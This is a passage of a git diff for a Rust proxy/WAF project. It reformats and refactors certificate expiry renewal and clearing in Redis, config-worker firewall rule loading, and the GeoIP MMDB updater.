Result<()> { - use x509_parser::prelude::*; - use x509_parser::nom::Err as NomErr; use rustls_pemfile::read_one; use std::io::BufReader; + use x509_parser::nom::Err as NomErr; + use x509_parser::prelude::*; // Get the list of domains from upstreams.yaml let domains = fetch_domains_from_upstreams(upstreams_path).await?; @@ -895,24 +1192,26 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( return Ok(()); } - log::info!("Checking certificate expiration for {} domain(s)", domains.len()); + log::info!( + "Checking certificate expiration for {} domain(s)", + domains.len() + ); - let redis_manager = RedisManager::get() - .context("Redis manager not initialized")?; + let redis_manager = RedisManager::get().context("Redis manager not initialized")?; let mut connection = redis_manager.get_connection(); let mut renewed_count = 0; let mut checked_count = 0; for domain in &domains { - let normalized_domain = domain.strip_prefix("*.").unwrap_or(domain); + let domain_key = domain; // Check if certificate exists in Redis // Get prefix from RedisManager let prefix = RedisManager::get() .map(|rm| rm.get_prefix().to_string()) .unwrap_or_else(|_| "ssl-storage".to_string()); - let fullchain_key = format!("{}:{}:live:fullchain", prefix, normalized_domain); + let fullchain_key = format!("{}:{}:live:fullchain", prefix, domain_key); let fullchain: Option> = redis::cmd("GET") .arg(&fullchain_key) .query_async(&mut connection) @@ -922,7 +1221,10 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( let fullchain_bytes = match fullchain { Some(bytes) => bytes, None => { - log::debug!("Certificate not found in Redis for domain: {}, skipping expiration check", domain); + log::debug!( + "Certificate not found in Redis for domain: {}, skipping expiration check", + domain + ); continue; } }; @@ -931,7 +1233,10 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( let fullchain_str = match String::from_utf8(fullchain_bytes.clone()) { Ok(s) => s, Err(_) => { - log::warn!("Fullchain for domain {} is not valid UTF-8, skipping expiration check", domain); + log::warn!( + "Fullchain for domain {} is not valid UTF-8, skipping expiration check", + domain + ); continue; } }; @@ -941,7 +1246,10 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( let cert_der = match read_one(&mut reader) { Ok(Some(rustls_pemfile::Item::X509Certificate(cert))) => cert, Ok(_) => { - log::warn!("No X509 certificate found in fullchain for domain: {}", domain); + log::warn!( + "No X509 certificate found in fullchain for domain: {}", + domain + ); continue; } Err(e) => { @@ -954,11 +1262,18 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( let (_, x509_cert) = match X509Certificate::from_der(&cert_der) { Ok(cert) => cert, Err(NomErr::Error(e)) | Err(NomErr::Failure(e)) => { - log::warn!("Failed to parse X509 certificate for domain {}: {:?}", domain, e); + log::warn!( + "Failed to parse X509 certificate for domain {}: {:?}", + domain, + e + ); continue; } Err(_) => { - log::warn!("Unknown error parsing X509 certificate for domain: {}", domain); + log::warn!( + "Unknown error parsing X509 certificate for domain: {}", + domain + ); continue; } }; @@ -969,13 +1284,15 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( let now = chrono::Utc::now(); // Convert OffsetDateTime to chrono::DateTime - let not_after = chrono::DateTime::::from_timestamp( - not_after_offset.unix_timestamp(), - 0 - ).unwrap_or_else(|| { - log::warn!("Failed to convert certificate expiration date for domain: {}", domain); - now + chrono::Duration::days(90) // Fallback to 90 days from now - }); + let not_after = + chrono::DateTime::::from_timestamp(not_after_offset.unix_timestamp(), 0) + .unwrap_or_else(|| { + log::warn!( + "Failed to convert certificate expiration date for domain: {}", + domain + ); + now + chrono::Duration::days(90) // Fallback to 90 days from now + }); // Calculate days until expiration let expires_in = not_after - now; @@ -983,29 +1300,48 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( checked_count += 1; - log::debug!("Certificate for domain {} expires in {} days (expires at: {})", - domain, days_until_expiration, not_after); + log::debug!( + "Certificate for domain {} expires in {} days (expires at: {})", + domain, + days_until_expiration, + not_after + ); // Check if certificate expires in less than 60 days if days_until_expiration < 60 { - log::info!("Certificate for domain {} expires in {} days (< 60 days), starting renewal process", - domain, days_until_expiration); + log::info!( + "Certificate for domain {} expires in {} days (< 60 days), starting renewal process", + domain, + days_until_expiration + ); // Request renewal from ACME let certificate_path = "/tmp/synapse-certs"; // Placeholder, will be stored in Redis - if let Err(e) = request_certificate_from_acme(domain, normalized_domain, certificate_path).await { + if let Err(e) = + request_certificate_from_acme(domain, domain_key, certificate_path).await + { log::warn!("Failed to renew certificate for domain {}: {}", domain, e); } else { - log::info!("Successfully initiated certificate renewal for domain: {}", domain); + log::info!( + "Successfully initiated certificate renewal for domain: {}", + domain + ); renewed_count += 1; } } else { - log::debug!("Certificate for domain {} is still valid (expires in {} days)", - domain, days_until_expiration); + log::debug!( + "Certificate for domain {} is still valid (expires in {} days)", + domain, + days_until_expiration + ); } } - log::info!("Certificate expiration check completed: {} checked, {} renewed", checked_count, renewed_count); + log::info!( + "Certificate expiration check completed: {} checked, {} renewed", + checked_count, + renewed_count + ); Ok(()) } @@ -1014,18 +1350,14 @@ async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> Result<( /// certificate_name: The certificate name (e.g., "kapnative.developnet.hu" or "*.kapnative.developnet.hu") /// certificate_path: The path where certificates are stored locally pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) -> Result<()> { - // Normalize certificate name (remove wildcard prefix if present) - let normalized_cert_name = certificate_name.strip_prefix("*.").unwrap_or(certificate_name); - - // Sanitize certificate name for file naming (matches the format used when saving) - let sanitized_cert_name = normalized_cert_name.replace('.', "_").replace('*', "_"); + // Use certificate name as-is + let normalized_cert_name = certificate_name; let cert_dir = std::path::Path::new(certificate_path); - let cert_path = cert_dir.join(format!("{}.crt", sanitized_cert_name)); - let key_path = cert_dir.join(format!("{}.key", sanitized_cert_name)); + let cert_path = cert_dir.join(format!("{}.crt", normalized_cert_name)); + let key_path = cert_dir.join(format!("{}.key", normalized_cert_name)); - log::info!("Clearing certificate: {} (normalized: {}, sanitized: {})", - certificate_name, normalized_cert_name, sanitized_cert_name); + log::info!("Clearing certificate: {}", certificate_name); // Delete local certificate files let mut deleted_local = false; @@ -1036,11 +1368,18 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - deleted_local = true; } Err(e) => { - log::warn!("Failed to delete local certificate file {}: {}", cert_path.display(), e); + log::warn!( + "Failed to delete local certificate file {}: {}", + cert_path.display(), + e + ); } } } else { - log::debug!("Local certificate file does not exist: {}", cert_path.display()); + log::debug!( + "Local certificate file does not exist: {}", + cert_path.display() + ); } if key_path.exists() { @@ -1050,7 +1389,11 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - deleted_local = true; } Err(e) => { - log::warn!("Failed to delete local key file {}: {}", key_path.display(), e); + log::warn!( + "Failed to delete local key file {}: {}", + key_path.display(), + e + ); } } } else { @@ -1062,14 +1405,20 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - { let mut cache = hash_cache.write().await; cache.remove(certificate_name); - log::debug!("Removed certificate hash from in-memory cache: {}", certificate_name); + log::debug!( + "Removed certificate hash from in-memory cache: {}", + certificate_name + ); } // Delete from Redis let redis_manager = match RedisManager::get() { Ok(rm) => rm, Err(e) => { - log::warn!("Redis manager not initialized, skipping Redis deletion: {}", e); + log::warn!( + "Redis manager not initialized, skipping Redis deletion: {}", + e + ); if deleted_local { log::info!("Certificate cleared from local filesystem only (Redis not available)"); } @@ -1089,15 +1438,25 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - format!("{}:{}:live:cert", prefix, normalized_cert_name), format!("{}:{}:live:chain", prefix, normalized_cert_name), // Metadata keys - format!("{}:{}:metadata:certificate_hash", prefix, normalized_cert_name), + format!( + "{}:{}:metadata:certificate_hash", + prefix, normalized_cert_name + ), format!("{}:{}:metadata:created_at", prefix, normalized_cert_name), format!("{}:{}:metadata:cert_failure", prefix, normalized_cert_name), - format!("{}:{}:metadata:cert_failure_count", prefix, normalized_cert_name), + format!( + "{}:{}:metadata:cert_failure_count", + prefix, normalized_cert_name + ), ]; let mut deleted_redis = 0; for key in &keys_to_delete { - match redis::cmd("DEL").arg(key).query_async::(&mut connection).await { + match redis::cmd("DEL") + .arg(key) + .query_async::(&mut connection) + .await + { Ok(count) => { if count > 0 { log::info!("Deleted Redis key: {}", key); @@ -1113,20 +1472,33 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - } // Also try to delete any archived certificates, challenge keys, lock keys, etc. (if they exist) + let escaped_cert_name = escape_redis_pattern(normalized_cert_name); let patterns_to_clean = vec![ - format!("{}:{}:archive:*", prefix, normalized_cert_name), - format!("{}:{}:challenge:*", prefix, normalized_cert_name), + format!("{}:{}:archive:*", prefix, escaped_cert_name), + format!("{}:{}:challenge:*", prefix, escaped_cert_name), format!("{}:{}:dns-challenge", prefix, normalized_cert_name), format!("{}:{}:lock", prefix, normalized_cert_name), ]; for pattern in &patterns_to_clean { - match redis::cmd("KEYS").arg(pattern).query_async::>(&mut connection).await { + match redis::cmd("KEYS") + .arg(pattern) + .query_async::>(&mut connection) + .await + { Ok(keys) => { if !keys.is_empty() { - log::info!("Found {} key(s) matching pattern '{}', deleting...", keys.len(), pattern); + log::info!( + "Found {} key(s) matching pattern '{}', deleting...", + keys.len(), + pattern + ); for key in &keys { - match redis::cmd("DEL").arg(key).query_async::(&mut connection).await { + match redis::cmd("DEL") + .arg(key) + .query_async::(&mut connection) + .await + { Ok(count) => { if count > 0 { log::info!("Deleted Redis key: {}", key); @@ -1141,18 +1513,28 @@ pub async fn clear_certificate(certificate_name: &str, certificate_path: &str) - } } Err(e) => { - log::debug!("Failed to list keys matching pattern '{}' (this is OK if none exist): {}", pattern, e); + log::debug!( + "Failed to list keys matching pattern '{}' (this is OK if none exist): {}", + pattern, + e + ); } } } if deleted_local || deleted_redis > 0 { - log::info!("Successfully cleared certificate '{}': deleted {} local file(s), {} Redis key(s)", - certificate_name, if deleted_local { 2 } else { 0 }, deleted_redis); + log::info!( + "Successfully cleared certificate '{}': deleted {} local file(s), {} Redis key(s)", + certificate_name, + if deleted_local { 2 } else { 0 }, + deleted_redis + ); } else { - log::warn!("Certificate '{}' not found in local filesystem or Redis", certificate_name); + log::warn!( + "Certificate '{}' not found in local filesystem or Redis", + certificate_name + ); } Ok(()) } - diff --git a/src/worker/config.rs b/src/worker/config.rs index 2b18d85..a30c391 100644 --- a/src/worker/config.rs +++ b/src/worker/config.rs @@ -1,14 +1,14 @@ +use crate::security::waf::actions::content_scanning::ContentScanningConfig; +use crate::utils::http_client::get_global_reqwest_client; +use crate::worker::Worker; +use flate2::read::GzDecoder; use hyper::StatusCode; use serde::{Deserialize, Serialize}; use std::collections::HashMap; use std::io::Read; -use flate2::read::GzDecoder; use std::sync::{Arc, OnceLock, RwLock}; use tokio::sync::watch; -use tokio::time::{interval, Duration, MissedTickBehavior}; -use crate::content_scanning::ContentScanningConfig; -use crate::http_client::get_global_reqwest_client; -use crate::worker::Worker; +use tokio::time::{Duration, MissedTickBehavior, interval}; pub type Details = serde_json::Value; @@ -55,36 +55,8 @@ pub struct WafRule { pub config: Option, } -#[derive(Debug, Clone, Deserialize, Serialize)] -pub struct RateLimitConfig { - pub period: String, - pub duration: String, - pub requests: String, -} - -impl RateLimitConfig { - pub fn from_json(value: &serde_json::Value) -> Result { - // Parse from nested structure: {"rateLimit": {"period": "25", ...}} - if let Some(rate_limit_obj) = value.get("rateLimit") { - serde_json::from_value(rate_limit_obj.clone()) - .map_err(|e| e.to_string()) - } else { - Err("rateLimit field not found".to_string()) - } - } - - pub fn period_secs(&self) -> u64 { - self.period.parse().unwrap_or(60) - } - - pub fn duration_secs(&self) -> u64 { - self.duration.parse().unwrap_or(60) - } - - pub fn requests_count(&self) -> usize { - self.requests.parse().unwrap_or(100) - } -} +// Re-export RateLimitConfig from actions module +pub use crate::security::waf::actions::rate_limit::RateLimitConfig; #[derive(Debug, Clone, Deserialize, Serialize)] pub struct RuleSet { @@ -149,7 +121,8 @@ pub async fn fetch_config( match status { StatusCode::OK => { // Check if response is gzipped by looking at Content-Encoding header first - let content_encoding = response.headers() + let content_encoding = response + .headers() .get("content-encoding") .and_then(|h| h.to_str().ok()) .unwrap_or("") @@ -157,19 +130,25 @@ pub async fn fetch_config( let bytes = response.bytes().await?; - let json_text = if content_encoding.contains("gzip") || - (bytes.len() >= 2 && bytes[0] == 0x1f && bytes[1] == 0x8b) { + let json_text = if content_encoding.contains("gzip") + || (bytes.len() >= 2 && bytes[0] == 0x1f && bytes[1] == 0x8b) + { // Response is gzipped, decompress it let mut decoder = GzDecoder::new(&bytes[..]); let mut decompressed_bytes = Vec::new(); - decoder.read_to_end(&mut decompressed_bytes) + decoder + .read_to_end(&mut decompressed_bytes) .map_err(|e| format!("Failed to decompress gzipped response: {}", e))?; // Check if the decompressed content is also gzipped (double compression) - let final_bytes = if decompressed_bytes.len() >= 2 && decompressed_bytes[0] == 0x1f && decompressed_bytes[1] == 0x8b { + let final_bytes = if decompressed_bytes.len() >= 2 + && decompressed_bytes[0] == 0x1f + && decompressed_bytes[1] == 0x8b + { let mut second_decoder = GzDecoder::new(&decompressed_bytes[..]); let mut final_bytes = Vec::new(); - second_decoder.read_to_end(&mut final_bytes) + second_decoder + .read_to_end(&mut final_bytes) .map_err(|e| format!("Failed to decompress second gzip layer: {}", e))?; final_bytes } else { @@ -180,7 +159,11 @@ pub async fn fetch_config( match String::from_utf8(final_bytes) { Ok(text) => text, Err(e) => { - return Err(format!("Final decompressed response contains invalid UTF-8: {}", e).into()); + return Err(format!( + "Final decompressed response contains invalid UTF-8: {}", + e + ) + .into()); } } } else { @@ -195,15 +178,17 @@ pub async fn fetch_config( return Err("API returned empty response body".into()); } - let body: ConfigApiResponse = serde_json::from_str(json_text) - .map_err(|e| { - let preview = if json_text.len() > 200 { - format!("{}...", &json_text[..200]) - } else { - json_text.to_string() - }; - format!("Failed to parse JSON response: {}. Response preview: {}", e, preview) - })?; + let body: ConfigApiResponse = serde_json::from_str(json_text).map_err(|e| { + let preview = if json_text.len() > 200 { + format!("{}...", &json_text[..200]) + } else { + json_text.to_string() + }; + format!( + "Failed to parse JSON response: {}. Response preview: {}", + e, preview + ) + })?; // Update global config snapshot set_global_config(body.config.clone()); @@ -214,7 +199,11 @@ pub async fn fetch_config( let trimmed = response_text.trim(); let status_code = status.as_u16(); if trimmed.is_empty() { - return Err(format!("API returned empty response body with status {}", status_code).into()); + return Err(format!( + "API returned empty response body with status {}", + status_code + ) + .into()); } match serde_json::from_str::(trimmed) { Ok(body) => Err(format!("API Error: {}", body.error).into()), @@ -236,7 +225,6 @@ pub async fn fetch_config( status.canonical_reason().unwrap_or("Unknown") ) .into()), - } } @@ -268,7 +256,13 @@ pub struct ConfigWorker { } impl ConfigWorker { - pub fn new(base_url: String, api_key: String, refresh_interval_secs: u64, skels: Vec>>, security_rules_config_path: std::path::PathBuf) -> Self { + pub fn new( + base_url: String, + api_key: String, + refresh_interval_secs: u64, + skels: Vec>>, + security_rules_config_path: std::path::PathBuf, + ) -> Self { Self { base_url, api_key, @@ -286,25 +280,37 @@ impl ConfigWorker { self } - pub fn with_nftables(mut self, nft_fw: Option>>) -> Self { + pub fn with_nftables( + mut self, + nft_fw: Option>>, + ) -> Self { self.nftables_firewall = nft_fw; self } - pub fn with_iptables(mut self, ipt_fw: Option>>) -> Self { + pub fn with_iptables( + mut self, + ipt_fw: Option>>, + ) -> Self { self.iptables_firewall = ipt_fw; self } } /// Load configuration from a local YAML file -pub async fn load_config_from_file(path: &std::path::PathBuf) -> Result> { +pub async fn load_config_from_file( + path: &std::path::PathBuf, +) -> Result> { use anyhow::Context; - let content = tokio::fs::read_to_string(path).await + let content = tokio::fs::read_to_string(path) + .await .with_context(|| format!("Failed to read security rules file: {:?}", path))?; let config: Config = serde_yaml::from_str(&content) .with_context(|| format!("Failed to parse security rules YAML from file: {:?}", path))?; - Ok(ConfigApiResponse { success: true, config }) + Ok(ConfigApiResponse { + success: true, + config, + }) } impl Worker for ConfigWorker { @@ -324,76 +330,150 @@ impl Worker for ConfigWorker { let iptables_firewall = self.iptables_firewall.clone(); // Create previous rules state for nftables/iptables - let nft_previous_rules: Arc>> = - Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); - let nft_previous_rules_v6: Arc>> = - Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); - let ipt_previous_rules: Arc>> = - Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); - let ipt_previous_rules_v6: Arc>> = - Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); + let nft_previous_rules: Arc< + std::sync::Mutex>, + > = Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); + let nft_previous_rules_v6: Arc< + std::sync::Mutex>, + > = Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); + let ipt_previous_rules: Arc< + std::sync::Mutex>, + > = Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); + let ipt_previous_rules_v6: Arc< + std::sync::Mutex>, + > = Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())); tokio::spawn(async move { // Check if running in local mode (no API key) if api_key.is_empty() { // LOCAL MODE: Load config from file once at startup - log::info!("[{}] No API key provided, loading config from local file...", worker_name); + log::info!( + "[{}] No API key provided, loading config from local file...", + worker_name + ); match load_config_from_file(&security_rules_config_path).await { Ok(config_response) => { - log::info!("[{}] Successfully loaded config from local file (access_rules: {}, waf_rules: {})", + log::info!( + "[{}] Successfully loaded config from local file (access_rules: {}, waf_rules: {})", worker_name, - config_response.config.access_rules.allow.ips.len() + config_response.config.access_rules.block.ips.len(), + config_response.config.access_rules.allow.ips.len() + + config_response.config.access_rules.block.ips.len(), config_response.config.waf_rules.rules.len() ); // Apply rules to BPF maps (skip WAF update in agent mode) if !skels.is_empty() { - if let Err(e) = crate::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { - log::error!("[{}] Failed to apply rules from local config: {}", worker_name, e); + if let Err(e) = + crate::security::access_rules::apply_rules_from_global_with_state( + &skels, + is_agent_mode, + ) + { + log::error!( + "[{}] Failed to apply rules from local config: {}", + worker_name, + e + ); } } else if let Some(ref nft_fw) = nftables_firewall { // Apply rules to nftables if BPF is not available - if let Err(e) = crate::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { - log::error!("[{}] Failed to apply rules to nftables: {}", worker_name, e); + if let Err(e) = crate::security::access_rules::apply_rules_nftables( + nft_fw, + &nft_previous_rules, + &nft_previous_rules_v6, + ) { + log::error!( + "[{}] Failed to apply rules to nftables: {}", + worker_name, + e + ); } } else if let Some(ref ipt_fw) = iptables_firewall { // Apply rules to iptables if BPF and nftables are not available - if let Err(e) = crate::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { - log::error!("[{}] Failed to apply rules to iptables: {}", worker_name, e); + if let Err(e) = crate::security::access_rules::apply_rules_iptables( + ipt_fw, + &ipt_previous_rules, + &ipt_previous_rules_v6, + ) { + log::error!( + "[{}] Failed to apply rules to iptables: {}", + worker_name, + e + ); } } } Err(e) => { - log::error!("[{}] Failed to load config from local file: {}", worker_name, e); + log::error!( + "[{}] Failed to load config from local file: {}", + worker_name, + e + ); } } // Set up file watcher for automatic reloading - log::info!("[{}] Running in local config mode - watching {} for changes", - worker_name, security_rules_config_path.display()); + log::info!( + "[{}] Running in local config mode - watching {} for changes", + worker_name, + security_rules_config_path.display() + ); // Set up file watcher - use notify::{Config as NotifyConfig, Event, EventKind, RecommendedWatcher, RecursiveMode, Watcher}; use notify::event::ModifyKind; - use std::time::{Duration, Instant}; + use notify::{ + Config as NotifyConfig, Event, EventKind, RecommendedWatcher, RecursiveMode, + Watcher, + }; use std::path::Path; + use std::time::{Duration, Instant}; use tokio::task; let file_path = security_rules_config_path.clone(); - let parent_dir = Path::new(&file_path).parent().unwrap().to_path_buf(); - let (local_tx, mut local_rx) = tokio::sync::mpsc::channel::>(1); + let parent_dir = match Path::new(&file_path).parent() { + Some(parent) => parent.to_path_buf(), + None => { + log::error!( + "[{}] Failed to watch security rules file: no parent directory for '{}'", + worker_name, + file_path.display() + ); + return; + } + }; + let (local_tx, mut local_rx) = + tokio::sync::mpsc::channel::>(1); let _watcher_handle = task::spawn_blocking({ let parent_dir = parent_dir.clone(); + let worker_name = worker_name.to_string(); move || { - let mut watcher = RecommendedWatcher::new( + let mut watcher = match RecommendedWatcher::new( move |res| { let _ = local_tx.blocking_send(res); }, NotifyConfig::default(), - ).expect("Failed to create file watcher"); - watcher.watch(&parent_dir, RecursiveMode::NonRecursive) - .expect("Failed to watch security rules directory"); + ) { + Ok(watcher) => watcher, + Err(e) => { + log::error!( + "[{}] Failed to create file watcher for '{}': {}", + worker_name, + parent_dir.display(), + e + ); + return; + } + }; + if let Err(e) = watcher.watch(&parent_dir, RecursiveMode::NonRecursive) { + log::error!( + "[{}] Failed to watch security rules directory '{}': {}", + worker_name, + parent_dir.display(), + e + ); + return; + } let (_rtx, mut rrx) = tokio::sync::mpsc::channel::(1); let _ = rrx.blocking_recv(); } @@ -436,17 +516,17 @@ impl Worker for ConfigWorker { // Apply rules to BPF maps (skip WAF update in agent mode) if !skels.is_empty() { - if let Err(e) = crate::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { + if let Err(e) = crate::security::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { log::error!("[{}] Failed to apply rules from reloaded config: {}", worker_name, e); } } else if let Some(ref nft_fw) = nftables_firewall { // Apply rules to nftables if BPF is not available - if let Err(e) = crate::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { + if let Err(e) = crate::security::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { log::error!("[{}] Failed to apply rules to nftables: {}", worker_name, e); } } else if let Some(ref ipt_fw) = iptables_firewall { // Apply rules to iptables if BPF and nftables are not available - if let Err(e) = crate::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { + if let Err(e) = crate::security::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { log::error!("[{}] Failed to apply rules to iptables: {}", worker_name, e); } } @@ -474,23 +554,52 @@ impl Worker for ConfigWorker { Ok(_config_response) => { // Apply rules to BPF maps after fetching config (skip WAF update in agent mode) if !skels.is_empty() { - if let Err(e) = crate::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { - log::error!("[{}] Failed to apply rules from initial config: {}", worker_name, e); + if let Err(e) = + crate::security::access_rules::apply_rules_from_global_with_state( + &skels, + is_agent_mode, + ) + { + log::error!( + "[{}] Failed to apply rules from initial config: {}", + worker_name, + e + ); } } else if let Some(ref nft_fw) = nftables_firewall { // Apply rules to nftables if BPF is not available - if let Err(e) = crate::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { - log::error!("[{}] Failed to apply rules to nftables: {}", worker_name, e); + if let Err(e) = crate::security::access_rules::apply_rules_nftables( + nft_fw, + &nft_previous_rules, + &nft_previous_rules_v6, + ) { + log::error!( + "[{}] Failed to apply rules to nftables: {}", + worker_name, + e + ); } } else if let Some(ref ipt_fw) = iptables_firewall { // Apply rules to iptables if BPF and nftables are not available - if let Err(e) = crate::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { - log::error!("[{}] Failed to apply rules to iptables: {}", worker_name, e); + if let Err(e) = crate::security::access_rules::apply_rules_iptables( + ipt_fw, + &ipt_previous_rules, + &ipt_previous_rules_v6, + ) { + log::error!( + "[{}] Failed to apply rules to iptables: {}", + worker_name, + e + ); } } } Err(e) => { - log::warn!("[{}] Failed to fetch initial config from API: {}", worker_name, e); + log::warn!( + "[{}] Failed to fetch initial config from API: {}", + worker_name, + e + ); log::warn!("[{}] Will retry on next scheduled interval", worker_name); } } @@ -518,17 +627,17 @@ impl Worker for ConfigWorker { // Apply rules to BPF maps after fetching config (skip WAF update in agent mode) if !skels.is_empty() { - if let Err(e) = crate::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { + if let Err(e) = crate::security::access_rules::apply_rules_from_global_with_state(&skels, is_agent_mode) { log::error!("[{}] Failed to apply rules from config: {}", worker_name, e); } } else if let Some(ref nft_fw) = nftables_firewall { // Apply rules to nftables if BPF is not available - if let Err(e) = crate::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { + if let Err(e) = crate::security::access_rules::apply_rules_nftables(nft_fw, &nft_previous_rules, &nft_previous_rules_v6) { log::error!("[{}] Failed to apply rules to nftables: {}", worker_name, e); } } else if let Some(ref ipt_fw) = iptables_firewall { // Apply rules to iptables if BPF and nftables are not available - if let Err(e) = crate::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { + if let Err(e) = crate::security::access_rules::apply_rules_iptables(ipt_fw, &ipt_previous_rules, &ipt_previous_rules_v6) { log::error!("[{}] Failed to apply rules to iptables: {}", worker_name, e); } } diff --git a/src/worker/geoip_mmdb.rs b/src/worker/geoip_mmdb.rs index d85f7bf..be68d13 100644 --- a/src/worker/geoip_mmdb.rs +++ b/src/worker/geoip_mmdb.rs @@ -1,13 +1,12 @@ use std::collections::HashMap; use std::path::PathBuf; +use std::sync::RwLock; +use std::time::Duration; -use anyhow::{anyhow, Context, Result}; -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tokio::time::{interval, Duration, MissedTickBehavior}; +use anyhow::{Context, Result, anyhow}; -use crate::http_client::get_global_reqwest_client; -use crate::worker::Worker; +use crate::utils::http_client::get_global_reqwest_client; +use crate::worker::{BoxFuture, PeriodicResult, PeriodicTask}; #[derive(Clone)] pub enum GeoipDatabaseType { @@ -16,16 +15,65 @@ pub enum GeoipDatabaseType { City, } -pub struct GeoipMmdbWorker { +impl GeoipDatabaseType { + fn name(&self) -> &'static str { + match self { + GeoipDatabaseType::Country => "country", + GeoipDatabaseType::Asn => "asn", + GeoipDatabaseType::City => "city", + } + } + + fn worker_name(&self) -> &'static str { + match self { + GeoipDatabaseType::Country => "geoip_country_mmdb", + GeoipDatabaseType::Asn => "geoip_asn_mmdb", + GeoipDatabaseType::City => "geoip_city_mmdb", + } + } + + fn filename(&self) -> &'static str { + match self { + GeoipDatabaseType::Country => "GeoLite2-Country.mmdb", + GeoipDatabaseType::Asn => "GeoLite2-ASN.mmdb", + GeoipDatabaseType::City => "GeoLite2-City.mmdb", + } + } + + async fn refresh(&self) -> Result<()> { + match self { + GeoipDatabaseType::Country => { + crate::security::waf::threat::refresh_geoip_country_mmdb().await + } + GeoipDatabaseType::Asn => crate::security::waf::threat::refresh_geoip_asn_mmdb().await, + GeoipDatabaseType::City => { + crate::security::waf::threat::refresh_geoip_city_mmdb().await + } + } + } +} + +/// Configuration for the GeoIP MMDB worker +#[derive(Clone)] +pub struct GeoipMmdbConfig { + pub mmdb_base_url: String, + pub versions_url: String, + pub mmdb_path: Option, + pub headers: Option>, + pub db_type: GeoipDatabaseType, +} + +/// Periodically checks for new GeoIP MMDB versions and downloads updates. +/// +/// Implements `PeriodicTask` for use with `PeriodicWorker`. +pub struct GeoipMmdbTask { interval_secs: u64, - mmdb_base_url: String, - versions_url: String, - mmdb_path: Option, - headers: Option>, - db_type: GeoipDatabaseType, + config: GeoipMmdbConfig, + /// Tracks the current version across executions + current_version: RwLock>, } -impl GeoipMmdbWorker { +impl GeoipMmdbTask { pub fn new( interval_secs: u64, mmdb_base_url: String, @@ -35,146 +83,145 @@ impl GeoipMmdbWorker { db_type: GeoipDatabaseType, ) -> Self { Self { + interval_secs, + config: GeoipMmdbConfig { + mmdb_base_url, + versions_url, + mmdb_path, + headers, + db_type, + }, + current_version: RwLock::new(None), + } + } + + /// Perform a sync operation and update the current version if changed + async fn do_sync(&self) -> PeriodicResult { + let current = self.current_version.read().unwrap().clone(); + let worker_name = self.config.db_type.worker_name(); + let db_name = self.config.db_type.name(); + + match sync_mmdb( + &self.config.mmdb_base_url, + &self.config.versions_url, + self.config.mmdb_path.clone(), + current.clone(), + self.config.headers.clone(), + self.config.db_type.clone(), + ) + .await + { + Ok(new_ver) => { + // Only update version if it's a real version (not "existing" or "direct") + let is_special = new_ver + .as_ref() + .map(|v| v == "existing" || v == "direct") + .unwrap_or(false); + + if !is_special && new_ver != current { + if let Ok(mut guard) = self.current_version.write() { + *guard = new_ver.clone(); + } + if new_ver.is_some() { + log::info!( + "[{}] GeoIP {} MMDB updated to version {:?}", + worker_name, + db_name, + new_ver + ); + } + } + + // Always refresh the database reader + if let Err(e) = self.config.db_type.refresh().await { + log::warn!( + "[{}] Failed to refresh GeoIP {} MMDB: {}", + worker_name, + db_name, + e + ); + } + + Ok(()) + } + Err(e) => Err(e.to_string().into()), + } + } +} + +impl PeriodicTask for GeoipMmdbTask { + fn name(&self) -> &str { + self.config.db_type.worker_name() + } + + fn interval_secs(&self) -> u64 { + self.interval_secs + } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + Box::pin(async move { self.do_sync().await }) + } + + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + // Same as execute - sync on startup + Box::pin(async move { self.do_sync().await }) + } + + fn log_success(&self) -> bool { + false // We handle our own logging for version changes + } +} + +// ============================================================================ +// Legacy Worker wrapper for backward compatibility +// ============================================================================ + +use crate::worker::{PeriodicWorker, Worker}; +use tokio::sync::watch; +use tokio::task::JoinHandle; + +/// Legacy wrapper that creates a GeoipMmdbTask and wraps it in PeriodicWorker +pub struct GeoipMmdbWorker { + inner: PeriodicWorker, +} + +impl GeoipMmdbWorker { + pub fn new( + interval_secs: u64, + mmdb_base_url: String, + versions_url: String, + mmdb_path: Option, + headers: 